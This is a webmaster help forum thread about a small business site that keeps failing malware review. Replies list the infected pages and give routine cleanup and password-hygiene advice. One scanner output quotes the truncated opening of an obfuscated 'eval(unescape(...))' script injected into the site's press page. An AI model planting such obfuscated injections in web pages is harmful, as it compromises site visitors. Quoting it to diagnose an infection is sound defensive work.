Can't clear reveiw though we've tried many things
by Leralee Whittle
11 months ago

Hello,

We worked with Dr. Anirban Banerjee who helped us find malicious code detected on line 15 of www.laleelee.com

We found and got rid of it and it kept appearing so we changed the host password, which was what godaddy suggested we do. Then we requested review. Apparently we have other problems and we don’t know how to identify them. Would you please help once again?

Thanks,
Leralee

by anirban
11 months ago

@Leralee

Thank you for providing credit. Much appreciated.

Let me clarify though that www.laleelee.com is not a customer of stopthehacker.com, Jaal LLC.

The clarification is important as we pride ourselves on our record. Not even a single website using our suite of services has ever been blacklisted.

“we changed the host password” good

From your message, it might be prudent to get a good security assessment of your site and Internet processes. This can help you plug your security holes and help prevent future issues. If interested, my company specializes in identifying website vulnerabilities ans works with clients to fix the problems. Please feel free to contact us via our site.

Hope this helps,
-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
www.stopthehacker.com
Jaal: Protecting the Internet, one website at a time™
by anirban
11 months ago

Jaal Scan ID # 4251300231-917 output

Malicious code detected on line 8 of www.laleelee.com/press.html

starts with
<!— (fu ncti on(ll Fua){ e val(un escape((’v#61r#20a#3d#22S crip#74En#6>

Hope this helps,
-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
www.stopthehacker.com
Jaal: Protecting the Internet, one website at a time™
by rathaus
11 months ago

Hi,

Our scan shows that there are several other pages that are infected beside index.html (which you cleaned?):
http://www.laleelee.com/video.html
http://www.laleelee.com/press.html

Thanks,
Noam Rathaus
Beyond Security
by Kaleh
11 months ago

>we changed the host password

That’s good, but not necessarily good enough. Many of the current web-site hacks are the result of passwords being stolen as a result of malware on the local computer. The computer(s) need to be scanned with multiple anti-malware products capable of detecting and removing trojans capable of stealing passwords, then passwords need to be changed (again) and they should not be stored in the FTP client.

In addition to removing things that are clearly visible, you should upgrade any blog, forum, gallery, CMS or other script to reduce vulnerabilities created by outdated code.

Be sure to use updated versions of your operating system, browser, and other applications (especially Java, Adobe Reader, Adobe Flash, Quicktime, RealPlayer etc). Many are recommending that you disable javascript in Adobe Reader.

Consider using a non-administrator account on your PC for daily work and only use the Administrator account when necessary.

The following resources may also help you evaluate and secure your site:

How to remove the “This site may harm your computer”
http://25yearsofprogramming.com/blog/20071223.htm

How to prevent your site from getting hacked. How to repair a damaged site. Website security precautions
http://25yearsofprogramming.com/blog/20070705.htm
About Contact Us Terms & Conditions Privacy Policy Copyright